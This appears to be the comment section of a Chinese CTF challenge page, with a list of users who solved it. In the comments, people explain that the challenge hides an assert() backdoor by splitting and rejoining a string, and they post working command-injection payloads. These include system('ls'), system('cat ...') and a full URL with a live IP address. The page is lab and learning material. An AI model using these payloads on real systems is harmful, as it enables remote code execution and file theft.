评分(11)
解题动态
诸诸诸 攻破了该题 6小时前
mjq1210 攻破了该题 7小时前
xiaoxiang07 攻破了该题 9小时前
fhdsfghfgf 攻破了该题 10小时前
muhkter8 攻破了该题 1天前
ysjy 攻破了该题 1天前
15369226763 攻破了该题 2天前
Asen 攻破了该题 2天前
doubao007 攻破了该题 2天前
re_void 攻破了该题 3天前
写作业ing 攻破了该题 3天前
wefyh 攻破了该题 3天前
花开花落 攻破了该题 3天前
LV-Yang 攻破了该题 3天前
sin 攻破了该题 3天前
debug3 攻破了该题 4天前
wangluobugeili 攻破了该题 4天前
ZyTbF521 攻破了该题 5天前
氧气舱 攻破了该题 5天前
评论
wangsir 1月前
举报
得到assert($_GET['s']),对s赋值找到flag文件
聪仔草莓51 2月前
举报
源码将字符串 a#s#s#e#r#t 按分隔符拆分后重新拼接成函数名 assert,并调用 assert(传入参数)。该函数在旧版本 PHP 中会把传入字符串当作代码执行,因此构造参数即可执行任意 PHP 代码。 利用方式:传入列目录的参数找到 flag 文件名,再传入读取文件的参数获取内容,即可得到本题答案。
西红柿dun牛腩 2月前
举报
这道题目,需要一点基础知识,还需要一些脑洞,初学者不容易想到。很好的学习素材
yiqie 2月前
举报
flag{**********}
icyskin 2月前
举报
http://160.202.254.160:19320/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)
ggsea 3月前
举报
列出当前目录:?s=print_r(scandir('./')),看到flag.txt
lawrencekz 4月前
举报
flag{******}
hwx 4月前
举报
直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg
b2026tf 4月前
举报
本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');
syhaisy 5月前
举报
20702af5309ab1f70e0f7e8a81076a4e